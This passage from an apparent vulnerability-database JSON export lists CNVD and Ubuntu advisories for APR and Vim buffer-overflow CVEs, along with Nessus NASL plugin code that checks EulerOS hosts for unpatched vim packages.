"2021-11-23T13:12:30", "id": "CLSA-2021:1637673150", "href": "https://repo.cloudlinux.com/centos6-els/updateinfo.xml", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cnvd": [{"lastseen": "2022-11-05T09:44:23", "description": "Apache Portable Runtime (APR, Apache Portable Runtime Library) is an Apache Foundation library that provides an underlying support interface for upper-level applications that can be used across multiple operating system platforms. a security vulnerability exists in Apache Portable Runtime version 1.7.0, which stems from An out-of-bounds array reading issue in the apr_time_exp*() function in the software, for which no details of the vulnerability are currently available.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-08-25T00:00:00", "type": "cnvd", "title": "Apache Portable Runtime Buffer Overflow Vulnerability", "bulletinFamily": "cnvd", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 3.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35940"], "modified": "2021-09-11T00:00:00", "id": "CNVD-2021-70094", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2021-70094", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2022-11-05T07:37:56", "description": "VIM is an editor based on the UNIX platform. VIM has a security vulnerability that can be exploited by an attacker to cause a buffer overflow in the heap.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-10-19T00:00:00", "type": "cnvd", "title": "VIM buffer overflow vulnerability", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3875"], "modified": "2021-12-21T00:00:00", "id": "CNVD-2021-101185", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2021-101185", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-11-05T07:03:22", "description": "Vim is a UNIX-based editor. Vim is vulnerable to a buffer overflow vulnerability that can be exploited by attackers to cause a heap buffer overflow.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-22T00:00:00", "type": "cnvd", "title": "Vim Buffer Overflow Vulnerability (CNVD-2022-05073)", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3872"], "modified": "2022-01-19T00:00:00", "id": "CNVD-2022-05073", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-05073", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2023-11-28T15:42:56", "description": "## Releases\n\n * Ubuntu 21.04 \n * Ubuntu 16.04 ESM\n * Ubuntu 14.04 ESM\n\n## Packages\n\n * apr \\- Apache Portable Runtime Library\n\nIt was discovered that APR incorrectly handled certain inputs. \nAn attacker could possibly use this issue to expose sensitive information.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-08-30T00:00:00", "type": "ubuntu", "title": "APR vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 3.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35940"], "modified": "2021-08-30T00:00:00", "id": "USN-5056-1", "href": "https://ubuntu.com/security/notices/USN-5056-1", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:P"}}], "nessus": [{"lastseen": "2023-11-08T16:18:18", "description": "According to the versions of the vim packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - vim is vulnerable to Heap-based Buffer Overflow (CVE-2021-3778, CVE-2021-3872, CVE-2021-3875)\n\n - vim is vulnerable to Use After Free (CVE-2021-3796)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2022-02-25T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP10 : vim (EulerOS-SA-2022-1217)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3778", "CVE-2021-3796", "CVE-2021-3872", "CVE-2021-3875"], "modified": "2023-11-07T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:vim-common", "p-cpe:/a:huawei:euleros:vim-enhanced", "p-cpe:/a:huawei:euleros:vim-filesystem", "p-cpe:/a:huawei:euleros:vim-minimal", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2022-1217.NASL", "href": "https://www.tenable.com/plugins/nessus/158373", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(158373);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/07\");\n\n script_cve_id(\n \"CVE-2021-3778\",\n \"CVE-2021-3796\",\n \"CVE-2021-3872\",\n \"CVE-2021-3875\"\n );\n\n script_name(english:\"EulerOS 2.0 SP10 : vim (EulerOS-SA-2022-1217)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the vim packages installed, the EulerOS installation on the remote host is affected by the\nfollowing vulnerabilities :\n\n - vim is vulnerable to Heap-based Buffer Overflow (CVE-2021-3778, CVE-2021-3872, CVE-2021-3875)\n\n - vim is vulnerable to Use After Free (CVE-2021-3796)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2022-1217\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ecc15435\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected vim packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3872\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/02/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/02/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:vim-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:vim-enhanced\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:vim-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:vim-minimal\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP10\");\n\nvar sp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(10)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP10\");\n\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP10\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"vim-common-8.2-1.h10.eulerosv2r10\",\n \"vim-enhanced-8.2-1.h10.eulerosv2r10\",\n \"vim-filesystem-8.2-1.h10.eulerosv2r10\",\n \"vim-minimal-8.2-1.h10.eulerosv2r10\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"10\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"vim\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-10T16:14:32", "description": "According to the versions of the vim packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities :\n\n - vim is vulnerable to Heap-based Buffer Overflow (CVE-2021-3778, CVE-2021-3872, CVE-2021-3875)\n\n - vim is vulnerable to Use After Free (CVE-2021-3796)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2022-02-11T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 3.0.6.0 : vim (EulerOS-SA-2022-1054)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3778", "CVE-2021-3796", "CVE-2021-3872", "CVE-2021-3875"], "modified": "2023-11-09T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:vim-x11", "p-cpe:/a:huawei:euleros:vim-common", "p-cpe:/a:huawei:euleros:vim-enhanced", "p-cpe:/a:huawei:euleros:vim-filesystem", "p-cpe:/a:huawei:euleros:vim-minimal", "cpe:/o:huawei:euleros:uvp:3.0.6.0"], "id": "EULEROS_SA-2022-1054.NASL", "href": "https://www.tenable.com/plugins/nessus/157914", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(157914);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/09\");\n\n script_cve_id(\n \"CVE-2021-3778\",\n \"CVE-2021-3796\",\n \"CVE-2021-3872\",\n \"CVE-2021-3875\"\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.6.0 : vim (EulerOS-SA-2022-1054)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the vim packages installed, the EulerOS Virtualization installation on the remote host is\naffected by the following vulnerabilities :\n\n - vim is vulnerable to Heap-based Buffer Overflow (CVE-2021-3778, CVE-2021-3872, CVE-2021-3875)\n\n - vim is vulnerable to Use After Free (CVE-2021-3796)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2022-1054\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6b8f925a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected vim packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3872\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/02/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/02/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:vim-X11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:vim-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:vim-enhanced\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:vim-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:vim-minimal\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.6.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.6.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.6.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"vim-X11-8.1.450-1.h11.eulerosv2r8\",\n \"vim-common-8.1.450-1.h11.eulerosv2r8\",\n \"vim-enhanced-8.1.450-1.h11.eulerosv2r8\",\n \"vim-filesystem-8.1.450-1.h11.eulerosv2r8\",\n \"vim-minimal-8.1.450-1.h11.eulerosv2r8\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"vim\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-08T16:17:36", "description": "According to the versions of the vim packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - vim is vulnerable to Heap-based Buffer Overflow (CVE-2021-3778, CVE-2021-3872, CVE-2021-3875)\n\n - vim is vulnerable to Use After Free (CVE-2021-3796)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2022-02-25T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP10 : vim (EulerOS-SA-2022-1236)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3778", "CVE-2021-3796", "CVE-2021-3872", "CVE-2021-3875"], "modified": "2023-11-07T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:vim-common", "p-cpe:/a:huawei:euleros:vim-enhanced", "p-cpe:/a:huawei:euleros:vim-filesystem", "p-cpe:/a:huawei:euleros:vim-minimal", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2022-1236.NASL", "href": "https://www.tenable.com/plugins/nessus/158393", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(158393);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/07\");\n\n script_cve_id(\n \"CVE-2021-3778\",\n \"CVE-2021-3796\",\n \"CVE-2021-3872\",\n \"CVE-2021-3875\"\n );\n\n script_name(english:\"EulerOS 2.0 SP10 : vim (EulerOS-SA-2022-1236)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the vim packages installed, the EulerOS installation on the remote host is affected by the\nfollowing vulnerabilities :\n\n - vim is vulnerable to Heap-based Buffer Overflow (CVE-2021-3778, CVE-2021-3872, CVE-2021-3875)\n\n - vim is vulnerable to Use After Free (CVE-2021-3796)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2022-1236\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f94e216e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected vim packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3872\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/02/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/02/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:vim-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:vim-enhanced\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:vim-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:vim-minimal\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP10\");\n\nvar sp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(10)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP10\");\n\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP10\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"vim-common-8.2-1.h10.eulerosv2r10\",\n \"vim-enhanced-8.2-1.h10.eulerosv2r10\",\n \"vim-filesystem-8.2-1.h10.eulerosv2r10\",\n \"vim-minimal-8.2-1.h10.eulerosv2r10\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"10\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"vim\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-23T15:34:10", "description": "According to the versions of the vim packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - vim is vulnerable to Heap-based Buffer Overflow (CVE-2021-3778, CVE-2021-3872, CVE-2021-3875)\n\n - vim is vulnerable to Use After Free (CVE-2021-3796)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2021-12-25T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP8 : vim (EulerOS-SA-2021-2817)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3778", "CVE-2021-3796", "CVE-2021-3872", "CVE-2021-3875"], "modified": "2023-11-22T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:vim-x11", "p-cpe:/a:huawei:euleros:vim-common", "p-cpe:/a:huawei:euleros:vim-enhanced", "p-cpe:/a:huawei:euleros:vim-filesystem", "p-cpe:/a:huawei:euleros:vim-minimal", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2021-2817.NASL", "href": "https://www.tenable.com/plugins/nessus/156297", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156297);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/22\");\n\n script_cve_id(\n \"CVE-2021-3778\",\n \"CVE-2021-3796\",\n \"CVE-2021-3872\",\n \"CVE-2021-3875\"\n );\n\n script_name(english:\"EulerOS 2.0 SP8 : vim (EulerOS-SA-2021-2817)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the vim packages installed, the EulerOS installation on the remote host is affected by the\nfollowing vulnerabilities :\n\n - vim is vulnerable to Heap-based Buffer Overflow (CVE-2021-3778, CVE-2021-3872, CVE-2021-3875)\n\n - vim is vulnerable to Use After Free (CVE-2021-3796)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-2817\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b5f4ead2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected vim packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3872\");\n\n script_set_attribute(attribute:\"exploitability_ease\", 